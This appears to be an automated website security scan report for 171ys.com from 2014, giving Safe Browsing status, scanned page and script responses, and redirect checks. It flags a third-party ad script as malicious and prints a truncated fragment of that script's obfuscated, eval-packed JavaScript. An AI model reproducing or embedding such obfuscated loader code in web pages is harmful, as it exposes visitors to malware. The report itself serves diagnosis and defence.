Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=171ys.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.171ys.com/ | HTTP/1.1 200 OK Date: Thu, 11 Sep 2014 05:42:25 GMT Accept-Ranges: bytes ETag: "5070de236bcdcf1:d91" Server: Microsoft-IIS/6.0 Content-Length: 37841 Content-Location: http://www.171ys.com/index.html Content-Type: text/html Last-Modified: Thu, 11 Sep 2014 02:50:26 GMT X-Powered-By: ASP.NET | clean |
http://www.171ys.com/index.html | 200 OK Content-Length: 37841 Content-Type: text/html | clean |
http://www.171ys.com/img/js/jquery.min.js | 200 OK Content-Length: 91841 Content-Type: application/x-javascript | clean |
http://www.171ys.com/js/ads/960.js | 200 OK Content-Length: 119 Content-Type: application/x-javascript | clean |
http://www.171ys.com/js/ads/9602.js | 200 OK Content-Length: 119 Content-Type: application/x-javascript | clean |
http://p.qiyou.com/view.php?uid=26184 | 200 OK Content-Length: 26 Content-Type: text/html | clean |
http://p.qiyou.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://r.qiyou.com/view.php?uid=26184 | 200 OK Content-Length: 211 Content-Type: text/html | clean |
http://f.ku63.com/f.asp?u=61919&m=3&n=&w=1000 | 200 OK Content-Length: 240 Content-Type: text/html | clean |
http://t.ku63.com/t.asp?u=61919&t=3&m=5&j=30&n= | 200 OK Content-Length: 226 Content-Type: text/html | clean |
http://t.ku63.com/js/t_20140331.js | 200 OK Content-Length: 12353 Content-Type: application/x-javascript | clean |
http://app.adanzhuo.com/appiso.js?l=9876cc&uid=60579 | 200 OK Content-Length: 3344 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('M p$=["\\K\\u","\\1b","\\1i\\j\\H\\s\\m",\'\\1d\\m\\g\\n\\f\\h\\j\',\'\\E\\m\\f\\l\\j\\k\',\'\\W\\r\\r\\y\\f\\1F\\f\\I\\1h\\g\\j\',\'\\1u\\f\\q\\1s\\k\',\'\\1h\\1t\\1 Antivirus reports:
| ||
http://js.users.51.la/15093081.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | clean |
http://js.users.51.la/15093060.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://www.171ys.com/js/ads/fmt.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.171ys.com/js/ads/tc.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 171ys.com
Result:
GET / HTTP/1.1
Host: 171ys.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 171ys.com
Referer: http://www.google.com/search?q=171ys.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 171ys.com
Referer: http://www.google.com/search?q=171ys.com
Result:
The result is similar to the first query. There are no suspicious redirects found.